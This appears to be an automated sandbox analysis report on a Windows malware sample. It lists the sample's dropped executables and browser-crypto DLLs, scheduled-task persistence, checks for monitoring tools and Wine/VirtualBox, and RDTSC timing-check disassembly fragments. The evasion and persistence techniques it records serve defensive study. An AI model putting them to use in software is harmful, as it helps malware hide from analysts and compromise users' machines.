Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.27.dr	Static PE information: section name:
Source: skotes.exe.27.dr	Static PE information: section name: .idata
Source: skotes.exe.27.dr	Static PE information: section name:
Source: skotes.exe.27.dr	Static PE information: section name: zmgocjct
Source: skotes.exe.27.dr	Static PE information: section name: whbetzff
Source: skotes.exe.27.dr	Static PE information: section name: .taggant
Source: random[1].exe.32.dr	Static PE information: section name:
Source: random[1].exe.32.dr	Static PE information: section name: .rsrc
Source: random[1].exe.32.dr	Static PE information: section name: .idata
Source: random[1].exe.32.dr	Static PE information: section name:
Source: random[1].exe.32.dr	Static PE information: section name: jgrcqeum
Source: random[1].exe.32.dr	Static PE information: section name: ulgvfaad
Source: random[1].exe.32.dr	Static PE information: section name: .taggant
Source: cc0a932c85.exe.32.dr	Static PE information: section name:
Source: cc0a932c85.exe.32.dr	Static PE information: section name: .rsrc
Source: cc0a932c85.exe.32.dr	Static PE information: section name: .idata
Source: cc0a932c85.exe.32.dr	Static PE information: section name:
Source: cc0a932c85.exe.32.dr	Static PE information: section name: jgrcqeum
Source: cc0a932c85.exe.32.dr	Static PE information: section name: ulgvfaad
Source: cc0a932c85.exe.32.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 32_2_00A7D91C push ecx; ret

32_2_00A7D92F

Source: file.exe	Static PE information: section name: dpgvilua entropy: 7.955208433759049
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.985648455072668
Source: random[1].exe.0.dr	Static PE information: section name: zmgocjct entropy: 7.953849389232527
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name: entropy: 7.985648455072668
Source: DocumentsDBKKKEHDHC.exe.0.dr	Static PE information: section name: zmgocjct entropy: 7.953849389232527
Source: skotes.exe.27.dr	Static PE information: section name: entropy: 7.985648455072668
Source: skotes.exe.27.dr	Static PE information: section name: zmgocjct entropy: 7.953849389232527

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsDBKKKEHDHC.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1009141001\cc0a932c85.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsDBKKKEHDHC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsDBKKKEHDHC.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsDBKKKEHDHC.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Users\user\DocumentsDBKKKEHDHC.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\DocumentsDBKKKEHDHC.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3403EB second address: 3403EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3403EF second address: 33FC77 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e mov esi, dword ptr [ebp+122D2ADFh] 0x00000014 stc 0x00000015 popad 0x00000016 push dword ptr [ebp+122D0C89h] 0x0000001c cld 0x0000001d call dword ptr [ebp+122D1E9Dh] 0x00000023 pushad 0x00000024 cld 0x00000025 xor eax, eax 0x00000027 jns 00007FBE44B74B5Ch 0x0000002d mov edx, dword ptr [esp+28h] 0x00000031 sub dword ptr [ebp+122D3892h], ecx 0x00000037 mov dword ptr [ebp+122D2D8Fh], eax 0x0000003d stc 0x0000003e mov esi, 0000003Ch 0x00000043 jns 00007FBE44B74B5Ch 0x00000049 add esi, dword ptr [esp+24h] 0x0000004d je 00007FBE44B74B6Fh 0x00000053 jmp 00007FBE44B74B69h 0x00000058 lodsw 0x0000005a xor dword ptr [ebp+122D3892h], edi 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 jc 00007FBE44B74B5Ch 0x0000006a mov dword ptr [ebp+122D3892h], edi 0x00000070 mov ebx, dword ptr [esp+24h] 0x00000074 jmp 00007FBE44B74B65h 0x00000079 sub dword ptr [ebp+122D1807h], ecx 0x0000007f push eax 0x00000080 push eax 0x00000081 push edx 0x00000082 push eax 0x00000083 push edx 0x00000084 jno 00007FBE44B74B56h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33FC77 second address: 33FC7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33FC7B second address: 33FC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB113 second address: 4BB117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB117 second address: 4BB11B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB3DD second address: 4BB3E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB3E8 second address: 4BB3F8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB3F8 second address: 4BB3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB54E second address: 4BB554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB6A9 second address: 4BB6B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB6B5 second address: 4BB6BB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BB6BB second address: 4BB6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBE451FC081h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE05B second address: 4BE0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push edi 0x00000007 pushad 0x00000008 mov cx, 1EA1h 0x0000000c mov esi, 7339BA44h 0x00000011 popad 0x00000012 pop edx 0x00000013 push 00000000h 0x00000015 jmp 00007FBE44B74B60h 0x0000001a call 00007FBE44B74B59h 0x0000001f jmp 00007FBE44B74B64h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 js 00007FBE44B74B58h 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE18D second address: 4BE19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE19C second address: 4BE1A6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBE44B74B5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE443 second address: 4BE449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE449 second address: 4BE452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE452 second address: 4BE456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4BE456 second address: 4BE45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D03B5 second address: 4D03B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF25B second address: 4DF268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007FBE44B74B56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFF63 second address: 4AFF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFF67 second address: 4AFF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AFF6B second address: 4AFF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBE451FC076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007FBE451FC076h 0x00000013 je 00007FBE451FC076h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007FBE451FC076h 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD3FB second address: 4DD405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBE44B74B56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD546 second address: 4DD565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC089h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD7DB second address: 4DD7DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD7DF second address: 4DD7E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD93F second address: 4DD944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DDDAF second address: 4DDDB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DDDB3 second address: 4DDDBD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBE44B74B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DDF23 second address: 4DDF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DDF2B second address: 4DDF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DDF30 second address: 4DDF48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop edi 0x00000007 jmp 00007FBE451FC07Ch 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1A84 second address: 4B1A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1A8A second address: 4B1A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1A90 second address: 4B1AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1AA3 second address: 4B1AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE38B second address: 4DE39F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jo 00007FBE44B74B56h 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE39F second address: 4DE3C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE451FC088h 0x00000007 pushad 0x00000008 jl 00007FBE451FC076h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DEBCC second address: 4DEBD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DEBD1 second address: 4DEBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DED5B second address: 4DED63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DED63 second address: 4DED67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B1A80 second address: 4B1A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF0D0 second address: 4DF0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF0D4 second address: 4DF0D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E3D7D second address: 4E3DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC07Fh 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBE451FC089h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 jmp 00007FBE451FC07Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E3DBD second address: 4E3DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E3DC2 second address: 4E3DE9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007FBE451FC076h 0x00000009 pop edx 0x0000000a jmp 00007FBE451FC086h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E3DE9 second address: 4E3DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E64CA second address: 4E64DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBE451FC07Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4E64DD second address: 4E64F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBE44B74B5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED270 second address: 4ED276 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED276 second address: 4ED280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ED280 second address: 4ED293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push edx 0x00000008 jl 00007FBE451FC076h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC774 second address: 4EC778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC778 second address: 4EC782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC782 second address: 4EC78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBE44B74B56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4EC78C second address: 4EC792 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECB5B second address: 4ECB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4ECB63 second address: 4ECB67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
